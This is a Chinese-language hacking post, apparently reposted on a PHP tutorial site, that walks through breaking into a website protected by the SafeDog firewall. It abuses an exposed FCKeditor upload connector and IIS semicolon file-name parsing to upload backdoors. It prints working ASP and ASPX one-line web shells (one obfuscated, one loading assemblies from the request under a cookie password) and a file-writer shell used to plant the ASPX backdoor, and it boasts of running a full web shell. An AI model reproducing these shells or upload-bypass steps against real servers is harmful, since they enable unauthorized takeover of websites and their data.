来源:自学PHP网 时间:2015-04-17 12:00 作者: 阅读:次
[导读] 安全狗真的是个很垃圾的程序,作为一个安全防护软件,安全狗不安全。这句话就是我说的,一个技术团队的产品是和这个团队的技术实力直接挂钩的。这个地址来自一个QQ上面的好友,...
|
安全狗真的是个很垃圾的程序,作为一个安全防护软件,安全狗不安全。这句话就是我说的,一个技术团队的产品是和这个团队的技术实力直接挂钩的。
这个地址来自一个QQ上面的好友,其实本来我不想看这个的,但是久闻安全狗的臭名,那么今天就百闻不如一打,技术不专,学艺不精,该打。http://www.2cto.com /fckeditor/editor/filemanager/connectors/test.html
复制代码FCKeditor的browser被删了,但是connector和测试页面都在,那就没问题了。
准备一个图片马,命名为a.asp;.gif然后上传,FCK自动重命名为a_asp;.gif,遇到这种情况,同一个文件再传一遍,文件就自动重命名为a.asp;(1).gif。
但是访问:http://www.2cto.com /YourUploadFilePath/file/a.asp;(1).gif
复制代码却弹出提示:
您的请求带有不合法的参数,谢谢合作!
来自安全狗互联网安全实验室-网站安全狗软件的友好提示,了解更多请点击
不过知道好多马儿都上不去,菜刀一句话也403没辙。干脆就用别的了<%If request("cmd")<>"" And request("path")<>"" then Createobject("Scri"&"pting.FileSys"&"temObject").CreateTextFile(server.mappath(request("path"))).WriteLine request("cmd")%>
复制代码这是上传文件的一句话服务端,这个一句话可以用习科兵器库[Attach.BlackBap.Org]网站安全分类下的asp上传类一句话ShellClient连接并上传文件。
除了这个工具,“ASPX一句话shell客户端”这个工具也可以完美的绕过安全狗。
这个aspx的服务端是:<%@ Page Language="C#" ValidateRequest="false" %>
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["psw"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
复制代码密码是psw,但是现在上传后门是在/shell.asp/这个目录,如果命名aspx是500不解析的。如果加分号,对aspx也是没用的。
在“新后门”那里如果写xxx.asp,xxx.asa,xxx.cer都没问题,但是上传../xxx.aspx这样的把目录转出去到/shell.asp/文件夹外面的话就失败了
想想怎么把aspx的后门写到/shell.asp/目录外面。用了个小马:<%
dim objFSO
dim fdata
dim objCountFile
on error resume next
Set objFSO = Server.CreateObject("Scripting.FileSystemObject")
if Trim(request("systempath"))<>"" then
fdata = request("sAvedata")
Set objCountFile=objFSO.CreateTextFile(request("systempath"),True)
objCountFile.Write fdata
if err =0 then
response.write "<font color=red>保存成功!</font>"
else
response.write "<font color=red>保存失败!</font>"
end if
err.clear
end if
objCountFile.Close
Set objCountFile=Nothing
Set objFSO = Nothing
Response.write "<form action='' method=post>"
Response.write "保存文件的<font color=red>绝对路径(包括文件名:如D:\web\x.asp):</font>"
Response.Write "<input type=text name=systempath width=32 size=50>"
Response.Write "<br>"
Response.write "本文件绝对路径"
Response.write server.mappath(Request.ServerVariables("SCRIPT_NAME"))
Response.write "<br>"
Response.write "输入马的内容:"
Response.write "<textarea name=sAvedata cols=80 rows=10 width=32></textarea>"
Response.write "<input type=submit value=保存>"
Response.write "</form>"
%>
复制代码这样就把aspx的马写到外面了
asp上传大马会提示危险参数禁止上传,但是用这个aspx就没问题了。这个网站路径是:E:\网站程序\rsc\,可惜这个aspx客户端不支持中文路径。
这个问题也好解决。看截图:
 只需要cmd拷贝一下就可以了。asp的大马轻松运行无压力。
这个站我真的没有被安全狗难倒,秒杀。有些东西只是纸老虎而已
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
